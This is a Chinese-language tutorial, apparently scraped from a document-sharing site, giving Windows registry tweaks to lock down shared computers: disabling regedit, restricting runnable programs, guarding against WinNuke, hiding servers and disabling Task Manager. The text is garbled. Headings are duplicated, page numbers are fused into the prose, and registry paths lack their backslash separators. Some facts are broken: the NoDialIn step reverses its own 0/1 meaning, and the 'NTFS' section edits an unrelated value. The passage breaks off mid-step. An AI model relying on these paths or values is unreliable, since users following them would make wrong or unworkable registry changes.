注册表对于很多用户来说是很危险的,尤其是初学者,为了安全,最好还是禁止注册表编辑器regedit.exe运行,在公共机房更加重要,不然自己的机器一不小心就被改得一塌糊涂了。修改注册表时,首先运行regedit进入注册表编辑器操作界面,在该界面中用鼠标依次单击HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPolicies键值,在右边的窗口中如果发现Policies下面没有System主键,则请在它下面新建一个主键,取名System,然后在右边空白处新建一个DWORD串值,名字取为DisableRegistryTools,把它的值修改为1,这样修改以后,使用这个计算机的人都无法再运行regedit.exe来修改注册表了。71l8、禁止修改、禁止修改“开始开始”菜单菜单一般,用户启动某一个程序时往往会在开始菜单下面的程序组中寻找需要的程序,如果我们随意更改开始菜单中的内容,可能会影响其他用户打开程序,所以我们常常需要禁止修改“开始”菜单中的内容。在设置这个内容时,我们可以用鼠标在注册表编辑器窗口中依次单击如下键值:HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplore,接着在右边的窗口中新建一个DWORD串值:“NoChangeStartMenu”,并把它的值设置为“1”。72l9、让用户只使用指定的程序、让用户只使用指定的程序 为防止用户非法运行或者修改程序,导致整个计算机系统处于混乱状态,我们可以通过修改注册表来达到让用户只能使用指定的程序的目的,从而保证系统的安全。设置时,可以在注册表编辑器窗口中依次打开HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer键值,然后在右边的窗口中新建一个DWORD串值,名字取为“RestrictRun”,把它的值设为“1”。然后在RestrictRun的主键下分别添加名为“1”、“2”、“3”等字符串值,然后将“1”,“2”、“3”等字符串的值设置为我们允许用户使用的程序名。例如将“1”、“2”、“3”分别设置为word.EXE、notepad.EXE、write.EXE,则用户只能使用word、记事本、写字板了,这样我们的系统将会做到最大的保障,也可以限制用户运行不必要的软件了。73l10、预防、预防WinNuke的破坏的破坏 现在有一个叫WinNuke的程序,能对计算机中的Windows系统有破坏作用,为防止该程序破坏Windows操作系统,导致整个计算机系统瘫痪,所以我们有必要预防WinNuke的破坏性。我们可以在注册表中对其进行设置,以保证系统的安全。设置时,在编辑器操作窗口中用鼠标依次单击键值HKEY_LOCAL_MACHINESystemCurrentControlSetServicesVxDMSTCP,然后在右边的窗口中新建或修改字符串“BSDUrgent”,并把其值设置为0,这样就可以预防WinNuke对系统的破坏了。74l11、禁用、禁用任务栏属性任务栏属性功能功能任务栏属性功能,可以方便用户对开始菜单进行修改,可以修改Windows系统的很多属性和运行的程序,这在我们看来是件很危险的事情,所以有必要禁止对它的修改。修改设置时,首先运行regedit进入注册表编辑器,找到如下分支HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer,在右窗格内新建一个DWORD串值NoSetTaskBar,然后双击NoSetTaskBar键值,在弹出的对话框的键值框内输入1,就可以达到禁用任务栏属性功能了。75l12、禁止修改显示属性、禁止修改显示属性有许多用户为了使自己使用的电脑外观设置变得更漂亮一点,以便能体现出个性化的风格,往往通过修改显示属性达到更改外观的目的。但在实践操作中,我们有时要保证所有计算机的设置都必须相同,以方便同步教学,这时我们就需要禁止修改显示属性了。修改时,可以用鼠标依次打开如下分支:HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem,接着在右边的窗口中新建一个DOWRD串值:然后将“新值#1”更名为“NoDispCPL”,并将其值设为“1”就可以了。76l13、隐藏、隐藏“网上邻居网上邻居”在局域网中,我们常常可以通过网上邻居来访问别的计算机上的内容,从而实现了资源共享的目的。但有时网上邻居会给我们造成安全上的隐患,例如有的不怀好意的用户可以利用网上邻居来非法删除其他计算机上的重要数据,给其他计算机造成了损失。为了避免这样的损失,我们可以利用注册表来隐藏“网上邻居”。设置时,请用鼠标依次访问键值HKEY_CURRENT_USERSoftwareMicrosoft WindowsCurrentVersionPoliciesExplorer,接着在右边的窗口中新建DWORD值NoNetHood,并把该值设置为1(十六进制)。77l14、禁止屏幕保护使用密码、禁止屏幕保护使用密码在公众场合下使用电脑,最忌讳的是用户随意设置系统密码,因为一旦某个用户设置了密码后,其他用户就不能正常使用,严重的能使计算机无法启动。为了避免这些现象的发生,我们有必要限制用户使用带有密码的屏幕保护。设置时,首先运行regedit命令打开注册表编辑器窗口,然后在该窗口中依次单击如下键值:CURRENT_USERControlPaneldesktopScreenSaveUsePassword,接着修改ScreenSaveUsePassword的值,如果把该值设置为0,表示为屏幕保护不设密码,如果设置为1则使用预设的密码,我们根据自己的需要设置就行了。78l屏蔽工作组信息HKEY_CURRENT_USERSoftwareWindowsCurrentVersionPoliciesNetworkNoNetSetupIDPage 双字节 1l去掉访问控制选项HKEY_CURRENT_USERSoftwareWindowsCurrentVersionPoliciesNetworkNoNetSetupSecurityPage 双字节 179l隐藏一个服务器隐藏一个服务器1、打开注册表编辑器,并在编辑器对话框中用鼠标依次单击如下分支:HKEY_LOCAL_ MACHINE SYSTEM CurrentControlSet Services LanmanServer Parameters键值。2、用鼠标单击该键值下面的Hidden数值名称,如果未发现此名称,那么添加一个,其数据类型为REG_DWORD。3、接着用鼠标双击此项,在弹出的“DWORD编辑器”对话框中输入1即可。4、最后单击“确定”按钮,并退出注册表编辑窗口,重新启动计算机就可以在局域网中隐藏一个服务器了。80l不允许用户拨号访问不允许用户拨号访问如果用户的计算机上面有重要的信息,有可能不允许其他人随便访问。那么如何禁止其他人拨入访问你的计算机,减少安全隐患呢,具体步骤为:1、打开注册表编辑器,并在编辑器中依次展开以下键值:HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesNetwork;2、在编辑器右边的列表中用鼠标选择“NoDialIn”键值,如果没有该键值,必须新建一个DWORD值,名称设置为“NoDialIn”;3、接着用鼠标双击“NoDialIn”键值,编辑器就会弹出一个名为“字符串编辑器”的对话框,在该对话框的文本栏中输入数值“1”,其中0代表禁止拨入访问功能,1代表允许拨入访问功能;4、退出后重新登录网络,上述设置就会起作用。81l限制使用系统的某些特性限制使用系统的某些特性1、运行注册表编辑器,进入HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem键值;2、如果不存在该键值,就新建一个;3、然后将该键值下方的DisableTaskManager的值设为1,表示将阻止用户运行任务管理器。4、接着将NoDispAppearancePage设为1,表示将不允许用户在控制面板中改变显示模式;5、下面再将NoDispBackgroundPage设为1,表示将不允许用户改变桌面背景和墙纸。82l将文件系统设置为将文件系统设置为NTFS格式格式 1、打开注册表编辑器,并在编辑器中依次展开以下键值:HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlFileSystem;2、在注册表编辑器中用鼠标单击“编辑”菜单,并在下拉菜单中选择“新建”菜单项,并在其弹出的子菜单中单击“DWORD值”;3、在编辑器右边的列表中输入DWORD值的名称为“NtfsDisableLastAccessUpdate”;4、接着用鼠标双击NtfsDi
展开阅读全文